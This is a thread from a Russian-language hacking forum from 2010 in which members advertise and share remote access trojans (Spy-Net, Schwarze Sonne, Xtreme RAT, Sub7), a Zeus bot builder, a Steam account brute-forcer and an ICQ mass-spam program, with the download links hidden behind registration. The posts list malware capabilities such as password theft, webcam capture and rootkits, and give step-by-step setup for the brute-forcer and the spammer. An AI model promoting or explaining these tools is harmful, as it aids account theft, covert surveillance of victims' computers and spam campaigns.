У меня не работает!
Возможно хостинг не поддерживает cURL, скачайте denwer + дополнение к нему, установите. Откройте файл php.ini (C:\WebServers\usr\local\php5) найдите строчку ;extension=php_curl.dll, убирите ; перед extension=php_curl.dll, сохраните.
Я нашёл баг!
Молодец, отпиши в пм мне.
Где скачать?
Держи:
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
(залит на 8 обменников).
Есть видео как он работает?
Держи на ютубе:
скачать:
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
Как поблагодарить тебя?
Подарите мне шестизнак = (, а то мой угнали.
Кто автор?
BlackWood
копипаст со zloy.org
Автор: неузнаваемый 13.04.2010, 23:31
Spy-Net 2.7
Новые функции включают в себя: - Добавлена доп cоед(защита от обрывов). - Повышенная стабильность соединения. Шпион-Net в настоящее время стабилен как SS-Крысы. - Увеличение скорости в файловои менеджере файлов и списке устройств. - восстановление паролей обновлено
Особенности и спецификации: - Сервер около 280 Кб, в зависимости от, если выбран значок, корень, UPX сжаты, и т.д. - Windows XP, Vista и 7 совместимый; - DNS Updater (по настоящее время работает с No-IP. Развивающихся DynDNS обновления атм) - File Manger с полной нагрузкой вариантов как загрузить FTP, набор атрибутов файлов, просмотр изображений, и т.д. и т.д. и т.п.; - Список процессов; - Список устройств; - Служба поиска; - Редактор реестра; - Установленные программы; - Активный список портов; - Подкл к удаленному рабочему столу; - Webcam захват; - Аудио Capture; - Password Recovery Tool (с прямой загрузки на FTP клиента или бревна); - Пароль Рвач; - Socks 4 / 5 прокси-сервер; - HTTP прокси; - Открыть веб-страницу; - Загрузка и выполнение; - Отправка локальных файлов, запускать скрытые или нормально; - Дистанционное: чат-клиент; - Командная строка; - Запуск cmd; - смотрим что в буфере обмена...; - Поиск удаленных файлов и поиска по Password Recovery (инструмент); - Доступ к папке загрузки, удаленного рабочего стола и скриншоты веб захвата меню. - Зашифрованный трафик между клиентом и сервером; - Несколько дополнительных опций (перезагрузка, блокировка кнопки и прочее ....) и все параметры, относящиеся к серверу (удаление, переименование и т.д. и т.п. и т.д.); - есть возможность делать инъекции в браузер - Rootkit в стадии бета-стадии разработки. Она будет скрывать имя процесса и запуск ключей, которые SPY_NET_RAT как имя. Протестировано под XP и работает, разрабатываются и испытываются на других ОС; - Возможность выбирать либо установлен сервер или нет в удаленном компьютере.
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как скажете автору СПАСИБО.
GraphicBooting RAT Beta v0.3
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как скажете автору СПАСИБО.
DiChecker v.1.3
Описание: - Многопоточный чекер прокси. - Поддержка и проверка Socks 4/5, HTTP прокси. - Функция ручного переключения на желаемый тип прокси для чека - Возможность выставить таймаут для проверки и тем самым получить наиболее быстрые прокси. - Удаление дубликатов из списка. - Удаление мусора из списка (можно вставлять любой текст, содержащий мусор). - Опция смены URL для чека. С помощью этого вы сможете чекать прокси под нужные вам ресурсы! (доступно с версии 1.2). - Автосохранение настроек(потоки, таймаут) (доступно с версии 1.2). - Улучшен интерфейс программы, исправлены некоторые ошибки. - Убрана ошибка при закрытии программы (Invalid Pointer Operation). - Поддержка Windows 7 x64. Изменения в версии 1.3: [*]Переделан механизм проверки. [*]Для ускорения чека - добалено поле настройки. В нем можно указать тип прокси, проверяемый на данный момент. Очень полезная штука для повышения скорости работы
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после того, как скажете автору СПАСИБО.
Автор: tshx006 18.04.2010, 12:43
Пароль какой на архив DiChecker v.1.3 ???
Автор: неузнаваемый 18.04.2010, 16:11
i
принятый на сайте
Автор: неузнаваемый 30.04.2010, 11:14
Брут предназначен для восстановления забытого пароля к steam аккаунту. [+]Поддержка прокси (http,sock4/5) [+]Многопоточность* [+]Встроенный чекер Аккаунтов [+]Хорошая скорость* [+]Автоматическое сохранение good-ов. [+]Автоматическое сохранение error-ов.(для того чтобы можно было перебрутить аккаунты попавшие на ошибки соединения).
Внимание:Это публичная альфа версия брута, предназначенная для выявления косяков и багов. Публичная версия имеет ограничение в 1 поток.
Для начала работы: Укажите в соответствующих полях txt файлы, один вида login;pass - список аккаунтов, второй proxy:port - прокси. Затем укажите какой тип прокси использовать,укажите тайм аут коннекта прокси и жмите START. Примечание: 1)Брут не реккомендуеться блондинкам 2)Поскольку на сайте без капчи можно ввести неверный пароль 2 раза - проксей надо очень много. 3)Если вам кажеться что брут остановился - значит у вас закончились прокси или логины. 4)Реккомендуеться использовать приватные прокси ибо с пабликом возможны ошибки подключения *ограничение в 1 поток(в приват версии без ограничений)
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
Автор: неузнаваемый 13.05.2010, 17:31
IMtale - представляет из себя программу для рассылки сообщений по номерам icq. Программа работает на самом последнем протоколе icq. Отличительная особенность программы - простота в использовании и максимальная автоматизация рутинных задач рассылки по номерам icq. Программа сочетает в себе простоту и оптимальность. Вам не нужно ломать голову по поводу того, как можно больше найти пользователей, какие дополнительные параметры поиска указывать, а какие нет, как избежать различных серверных лимитов на отправку и поиск. Интеллектуальный алгоритм программы сам все предусматривает. Программа поддерживает русский и английский языки. Потоки – количество одновременных соединений через прокси сервера с сервером icq. Рекомендуемое значение потоков (200-400)
Прокси серверов в файле – количество прокси серверов, через которые вы будете работать.
Рабочие прокси – прокси сервера, через которые в данный момент произошло соединение удачное соединение с сервером icq.
Номера для логина в файле – номера, через которые будет производиться поиск по заданным параметрам и рассылка сообщений.
Неверные пароли – количество номеров в файле для логина, у которых пароль неверный, то есть подключить и отправлять сообщения с таких номеров не удастся.
Лимит частых подключений – из-за частых подключений с одного ip адреса (в нашем случае прокси сервера) сервера icq блокируют доступ данного ip на 5-10 минут. IMTALE автоматически подключит незаблокированный прокси сервер и продолжит работу дальше.
Номеров в онлайне – количество номеров из списка «Номеров для логина в файле», которым удалось произвести удачное соединение с сервером icq.
Сообщений отправлено – количество отправленных сообщений и запросов авторизаций пользователям по заданным параметрам.
Сообщений получено – количество полученных программой сообщений от пользователей. Лог сообщений Вы можете посмотреть, нажав соответствующую кнопку в окне программы. Так же данный параметр указывает на то, что данное количество людей 100% получили Ваше сообщение.
Запросов авторизаций получено – количество полученных программой запросов на авторизацию. Запрос на авторизацию означает, что человек пытается добавить номер icq, который ему отослал сообщений. IMTALE автоматически авторизует пользователя. Так же данный параметр указывает на то, что данное количество людей 100% получили Ваше сообщение.
Ответили на запрос авторизации – количество авторизаций от программы, которое одобрили пользователи. Так же данный параметр указывает на то, что данное количество людей 100% получили Ваше сообщение.
Добавили в список – количество человек, которые добавили номер, с которого пришло сообщение в свой контакт лист. Так же данный параметр указывает на то, что данное количество людей 100% получили Ваше сообщение.
Пользователей найдено – количество номеров icq, которые программа нашла по заданным Вами параметрам. Сервер очень часто присылает уже найденные номера программой. Поэтому чем больше найденных пользователей, тем сложнее от сервера получить новые номера. IMTALE имеет встроенную интеллектуальную систему поиска, которая позволит получить от сервера больше результатов по указанным критериям поиска.
Пользователей не найдено – это значение растет обычно если вы ввели редкие параметры поиска или ошиблись в названии города (если Вы конечно указывали город), но сервер время от времени и на вполне нормальные запросы поиска отвечает этим пакетом.
Результаты поиска - это общее число получаемых ответов от сервера на поисковые запросы. В настоящее время большинство ответов сервера содержат одинаковые результаты поиска. Если количество найденных пользователей не растет совсем, а растет эта величина, то значит на сервере больше нет пользователей соответствующим указанным критериям поиска.
Поисковый лимит базы – сервера icq блокируют номера, которые слишком часто пользуются поиском других номеров по заданным параметрам, блокировка номера длится 5-10 минут. Программа автоматически подключает к поиску другой номер.
Обработано пользователей – количество пользователей, которым были отосланы указанные вами сообщения. Номер;пароль – в данном поле указывается путь до файла с номерами, которые будут использоваться для рассылки сообщений. Формат файла с номерами должен выглядеть следующим образом:
Прокси сервера – в данном поле указывается путь до файла с прокси серверами, через которые будет производиться соединение с серверами icq и дальнейшая рассылка сообщений. Формат файла с номерами должен выглядеть следующим образом:
* Ip : port * Ip : port * Ip : port * Ip : port * Ip : port
Тип прокси – программа IMTALE поддерживает https, socks4, socks5 прокси сервера (подробнее о прокси серверах можно прочесть тут). Так же программа может работать и без прокси серверов для этого нужно указать тип none, но в данном случае количество потоков нужно указывать не более 20, так как сервера icq блокирую большое количество соединений с одного ip адреса.
Потоки – количество потоков равняется количеству номеров icq с которых будет вестись рассылка ваших сообщений, что соответственно влияет на скорость поиска и рассылки. Рекомендуемые значения потоков 200-400.
Вести лог файлы - файлы которые будут находиться в папке /LOGS/. Файлы в формате *.txt в которых хранится лог:
Лог записывается каждые 15 минут, лог приходящих сообщений записывается сразу. Список найденных пользователей в логе пригодится для повторной рассылки по списку.
Использовать
Поиск - здесь задаются параметры поиска по:
* Пол * Возраст * Страна * Язык * Город
Чем легче параметры поиска тем большее количество номеров будет найдено, соответственно большее количество пользователей получат ваши сообщение. Поиск можно производить по 4 странам одновременно, если нужен поиск с критерием по одной стране то нужно указывать во всех четырёх полях одну и туже страну иначе один раз поиск будет производится по стране а последующие с пустым запросом. Так же поиск можно производить по списку городов (названия городов разделяются переводом строки)
Список номеров – путь до файла базы которую вы составили заблаговременно, к примеру посетители вашего сайта которым нужно разослать сообщение. После того как программа разошлёт сообщения, она оставляет номера для рассылки в состоянии онлайн, что бы получить запоздалые сообщения от пользователей и отвечать на них. Формат файла должен выглядеть следующим образом:
* Номер icq * Номер icq * Номер icq * Номер icq * Номер icq
Диапазон – здесь задается диапазон номеров, на которые нужно произвести рассылку сообщений. Количество номеров в диапазоне не рекомендуется превышать 1000000 номеров. После того как программа разошлёт сообщения, она оставляет номера для рассылки в состоянии онлайн, что бы получить запоздалые сообщения от пользователей и отвечать на них.
Сообщения
Сообщение(1) и Сообщение(2) – здесь задается что будет отсылаться первоначально сообщение или запрос авторизации, а так же текст сообщения и запроса авторизации.
Сообщение в ответ на событие – здесь задается сообщение которое будет отослано на событие, событием в данном случае будет являться положительный ответ на запрос авторизации, а так же любое сообщение отправленное пользователем номеру с которого происходила рассылка сообщений.
Чёрный список номеров
Список номеров по которым не будет производиться рассылка сообщений. Формат списка должен выглядеть следующим образом:
* Номер icq * Номер icq * Номер icq * Номер icq * Номер icq
Не рекомендуется указывать большое количество номеров, т.к. это увеличит нагрузку на программу.
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
Автор: неузнаваемый 17.05.2010, 17:19
MS-DRT 2.2.22 RAT
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
[REL] Schwarze Sonne RAT 0.9 Now to SS-RAT:
Whats new: [+] Miniserver [+] Better Injection of the Rootkit/Persistance Dll [+] Search for Customers [+] Change their Colour/IDs [+] Listen on multiple Ports [+] New Icons[*] Several Bugfixes!
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
Автор: MadDog 17.05.2010, 18:19
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
Автор: Creeping Death 17.05.2010, 22:15
MadDog, ну оно как бы полюбому ругаться будет.
Автор: MadDog 17.05.2010, 23:30
Creeping Death, да я понимаю, просто лень каспера вырубать)
Автор: sashakiev 23.06.2010, 21:01
Ув. программисты, нужна помощь. Нужна программа позволяющая вытянуть максимальное число e-mail адресов (или файл их содержащий), зарегистрированных пользователей определённого форума (или сайта определённой тематики, в основном забугорные). Уверен идея не новая, подскажите, пожалуйста, есть ли таковая и можно ли справиться самостоятельно т.к. я не спец в этих вопросах? Готов учиться и заплатить за реальную помощь.
Автор: Creeping Death 23.06.2010, 23:13
такое к сожалению не возможно
Автор: неузнаваемый 26.06.2010, 14:43
zeus+build
Version: 1.3.2.1
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
Sub7 2.3.1(MM)Leak
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.
Xtreme RAT v1.1
Скрытый текст
В этом блоке содержится скрытый текст, который вы сможете увидеть после регистрации. Зарегистрироваться.